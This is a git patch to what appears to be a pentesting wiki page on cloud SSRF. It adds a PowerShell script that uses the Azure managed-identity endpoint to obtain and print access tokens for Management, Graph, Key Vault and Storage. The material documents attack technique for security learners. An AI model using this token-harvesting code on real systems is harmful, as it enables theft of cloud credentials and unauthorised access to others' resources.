From 5dea759ed03ce48e1be84ac68a315102bd4fa076 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Tue, 24 Dec 2024 23:35:25 +0000
Subject: [PATCH] GITBOOK-4455: No subject

---
 .../cloud-ssrf.md                             | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)

diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index b6721d66b..b005568df 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -509,6 +509,49 @@ curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08
 {% tab title="PS" %}
 {% code overflow="wrap" %}
 ```powershell
+# Define the API version
+$API_VERSION = "2019-08-01"
+
+# Function to get a token for a specified resource
+function Get-Token {
+    param (
+        [string]$Resource
+    )
+    $url = "$IDENTITY_ENDPOINT?resource=$Resource&api-version=$API_VERSION"
+    $headers = @{
+        "X-IDENTITY-HEADER" = $IDENTITY_HEADER
+    }
+    try {
+        $response = Invoke-RestMethod -Uri $url -Headers $headers -Method Get
+        $response.access_token
+    } catch {
+        Write-Error "Error obtaining token for $Resource: $_"
+    }
+}
+
+# Get Management Token
+$managementToken = Get-Token -Resource "https://management.azure.com/"
+Write-Host "Management Token: $managementToken"
+
+# Get Graph Token
+$graphToken = Get-Token -Resource "https://graph.microsoft.com/"
+Write-Host "Graph Token: $graphToken"
+
+# Get Vault Token
+$vaultToken = Get-Token -Resource "https://vault.azure.net/"
+Write-Host "Vault Token: $vaultToken"
+
+# Get Storage Token
+$storageToken = Get-Token -Resource "https://storage.azure.com/"
+Write-Host "Storage Token: $storageToken"
+
+
+
+
+
+
+
+
 # API request in powershell to management endpoint
 $Token = 'eyJ0eX..'
 $URI='https://management.azure.com/subscriptions?api-version=2020-01-01'